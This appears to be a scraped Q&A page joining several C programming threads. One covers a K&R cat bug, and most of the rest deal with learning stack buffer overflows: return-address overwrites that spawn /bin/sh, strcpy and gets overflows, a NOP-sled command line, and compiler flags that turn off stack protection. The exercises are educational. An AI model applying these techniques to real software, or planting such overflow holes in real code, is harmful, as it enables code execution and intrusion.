I was working with example from K&R, its a cat utility to view files
#include <stdio.h>
main(int argc,char **argv){
FILE *fp;
void filecopy(FILE *,FILE *);
if(argc==1)
filecopy(stdin,stdout);
else // accidentally mistyped
while(--argv > 0) // should have been --argc > 0
if((fp=fopen(*++argv,"r"))==NULL){
printf("cat: can't open %s\n",*argv);
return 1;
}else{
filecopy(fp,stdout);
fclose(fp);
}
return 0;
}
void filecopy(FILE *ifp,FILE *ofp)
{
int c;
while((c=getc(ifp))!=EOF)
putc(c,ofp);
}
When compiled with gcc cat.c,
and when I ran ./a.out cat.c from the terminal,all I got was some chinnesse symbols and some readable text(names like _fini_array_,_GLOBAL_OFFSET_TABLE_ and etc..) and the garbage just went on until I pressed Ctrl+C, I wanted to ask why I didn't got Segmentation fault, because didn't the program was reading every memory location from argv start address? and I shouldn't have the rights to do so?
Let's look at these two consecutive lines:
while(--argv > 0)
if((fp=fopen(*++argv,"r"))==NULL){
Every time you decrement argv, you end up incrementing it on the next line. So overall, you are just decrementing and incrementing argv a lot but you are never actually reading past the bounds of the argv memory area.
Even if you were reading past the bounds of the argv memory area, that would be undefined behavior and you are not guaranteed to get a segmentation fault. The result you get depends on your compiler your, operating system, and the other things in your program.
I suspect that executing --argv also gives you undefined behavior, because after that line is executed, the pointer would probably point outside of the array allocated for argv data. But, since you didn't dereference argv while it was pointing there, it turned out to be OK.
Related
I'm starting to tinker with buffer overflows, and wrote the following program:
#include <unistd.h>
void g() {
execve("/bin/sh", NULL, NULL);
}
void f() {
long *return_address;
char instructions[] = "\xb8\x01\x00\x00\x00\xcd\x80"; // exit(1)
return_address = (long*) (&return_address + 2);
*return_address = (long)&g; // or (long)instructions
}
int main() {
f();
}
It does what I expect it to do : return_address overwrite the return address of f with the address of g, which opens a shell. However, if I set the return address to instructions, I got a segmentation fault, and none of the instructions in instructions is executed.
I compile with GCC, using -fno-stack-protector.
How could I prevent this segmentation fault occurring ?
At least one problem isn't related to the buffer overflow.
execve("/bin/sh", NULL, NULL);
That first NULL becomes the argv of the process you're starting. argv must be an array of strings that is terminated with a NULL. So a segfault may happen when /bin/sh starts up, tries to read argv[0], and dereferences NULL.
void g(void) {
char *argv[] = { "/bin/sh", NULL };
execve(argv[0], argv, NULL);
}
You might also add -z execstack to the gcc command line, which will tell the linker to permit an executable stack. You should also verify that the instructions you have there are what exit(1) compiles to on your system if you got them from a tutorial somewhere.
Firstly, I'm using this compilation flags:
gcc -fno-stack-protector -z execstack -m 32
Ok lets look, on code below
int main(int argc, char *argv[]){
char pass[8];
char logged = 'n';
strcpy( pass, argv[1] );
if( logged == 'y' ){
printf("Hello \n");
} else {
printf("Run hacker :(\n");
}
return 0;
}
And second code
int main(int argc, char *argv[]){
char logged = 'n';
char pass[8];
strcpy( pass, argv[1] );
if( logged == 'y' ){
printf("Hello \n");
} else {
printf("Run hacker :(\n");
}
return 0;
}
These codes are vulnerable for stack overflow attack. (passing 'yyyyyyyyy' as arg would pass the test)
But why? Order of local variables in second code is different than in first code. So queue of pushing local variables on stack should be other too, but it is not?
First a stack overflow vulnerability is not exactly the same thing as stack corruption.
This code is writing an automatic variable that is allocated on the stack (in your frame). The compiler reserved 8 bytes on the stack for the pass string. If you write more than 8 bytes, you will be corrupting whatever else is on the stack right next to pass[] array. Doesn't really matter what it is; it will be corrupted, and that is what stack corruption means.
With some skill, one can generate an input (argv[1]) string (really an instruction byte stream) that will align with the return instruction from the main and thus can force execution of your code. That is what vulnerability is.
You seem to understand that the order of variables on your stack just determines what and how may be corrupted, and you should see exactly what you expected if you turn off the stack protection by using -fno-stack-protector, plus minus the exact stack layout imposed by your compiler. With the protection on, both cases should dump the stack smashing backtrace and diagnostics.
Note that different linux distrubution set the no-stack-protector default to different values, but as long as you explicitly control it on the command line you are all set.
The -z execstack option is a mechanism dealing with whether or not to allow executing on the stack; here it is irrelevant as your code is just corrupting the stack.
I'm trying to call the oopsIGotToTheBadFunction by changing the return address via the user input in goodFunctionUserInput.
Here is the code:
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
/**
> gcc isThisGood.c
> a.out
hello
Overflow failed
*/
I've tried loading the buffer with 0123456789012345 but not sure what to put for the rest of it to get the address. The address is 0x1000008fc.
Any insights or comments would be helpful.
I'm going to give this the benefit of the doubt and presume this is an exercise intended to learn about the stack (perhaps homework) and not learning how to do anything malicious.
Consider where the return address of goodFunctionUserInput is on the stack and what would happen if you changed it. You may wish to check the disassembly to see how much space on the stack the compiler made for goodFunctionUserInput and where exactly buf is. When you figure out how long a string to enter, consider the endianness of the machine and what that means for the address you want to overwrite into the return address of goodFunctionUserInput. Worrying about what sorts of awful things this does to the stack isn't important here as your function you want to call simply calls exit.
I have installed the linux distro named DVL (damn vulnerable linux), and I'm exercising with buffer overflow exploits.
I wrote two virtually identical programs which are vulnerable to bof:
//bof_n.c
#include <stdio.h>
void bof() {
printf("BOF");
}
void foo(char* argv) {
char buf[10];
strcpy(buf, argv);
prinf("foo");
}
int main(int argc, char* argv[]) {
if (argc >= 1) {
foo(argv[1]);
}
return 0;
}
and
//bof.c
#include <stdio.h>
void bof() {
printf("BOF!\n");//this is the only change
}
void foo(char* argv) {
char buf[10];
strcpy(buf, argv);
prinf("foo");
}
int main(int argc, char* argv[]) {
if (argc >= 1) {
foo(argv[1]);
}
return 0;
}
After that I compiled both of them, and I obtained the bof() function address in both cases (e.g., objdump -d bof.o | grep bof). Let's name such an address ADDR which is on 4 byte.
I also found that if I write 32 byte in the buf variable, the EIP register is completely overwritten (I cannot copy here the output of gdb since it is on a virtual machine).
Now, if I do:
./bof `perl -e 'print "\x90"x28 . "ADDR"'`
I get:
fooBOF!
Segmentation fault
Instead if I try the same approach but using bof_n, I only get the "Segmentation fault" message.
Therefore I tried to increment the number of time ADDR value is repeated, and I found that if it is being repeated for at least 350 times, I get the wanted result. But instead of having the output above exactly, I get a long list of "BOF" messages one after the other. I tried to obtain just one "BOF" message, but apparently I cannot do that (I got or zero, or a long list of them).
Why this is happening? Any idea?
I'm using DVL with gcc 3.4.6
What's your goal?
You should really be using a debugger for this, try the GDB Debugger or gdb. With it you can see the memory/registers/stack and disassembly of whats currently going on in the system.
I'd guess that in the first function, the string being only 3 characters in length, gets optimized to \x42\x4f\x46\x00, so the disassembly may be slightly different.
The C source is pretty much irrelevant, you'll need to either disassemble or fuzz both binaries to find appropriate size for both NOP sleds.
I found out the solution. The issue was about the printing of the message and not the buffer overflow exploit itself.
In fact the register eip was being correctly overwritten also in the bof_n example, and the program flow was being correctly redirected in the bof() function. The problem was that, apparently, the stdout were not flushed out before the Segmentation fault and hence no message was being shown.
Instead, using fprintf(stderr, "BOF");, I finally get the "BOF" message.
Recently I came across the problem of geting 'Oops, Spwan error, can not allocate memory' while working with one C Application.
To understand the File Descriptor and Memory management better I give a try this sample program and it gives me shocking result.
Here is the code.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int ac, char *av[]);
int main(int ac, char *av[])
{
int fd = 0;
unsigned long counter=0;
while (1)
{
char *aa = malloc(16384);
usleep(5);
fprintf(stderr,"Counter is %ld \n", counter);
fd = fopen("/dev/null",r")
}
return 0;
}
Here in the sample program I am trying to allocate memory every 5 micro second and also open a file descriptor at the same time.
Now when I run the program it started increasing the memory and also file descriptor star increasing, but memory increase upto 82.5% and file descriptor increase upto 1024. I know 'ulimit' set this parameter and it is 1024 by default.
But this program must crash by eating the memory or it should gives error ' Can't spawn child', but it is working.
So Just wanted to know why it is not crashing and why it is not giving child error as it reached file descriptor limit.
It's not crashing probably because when malloc() finds no more memory to allocate and return, it simply returns NULL. Likewise, open() also just returns a negative value. In other words, the cooperation of your OS and the standard library is smarter than it would enable your program to crash.
What's the point in doing that?
Plus on linux, the system won't even eat up the memory if nothing is actually written on "aa".
And anyway, if you could actually take all the memory (which will never happen, for Linux and *bsd, don't know about windows), it would just result in making the system lag like hell or even freeze, not just crashing your application.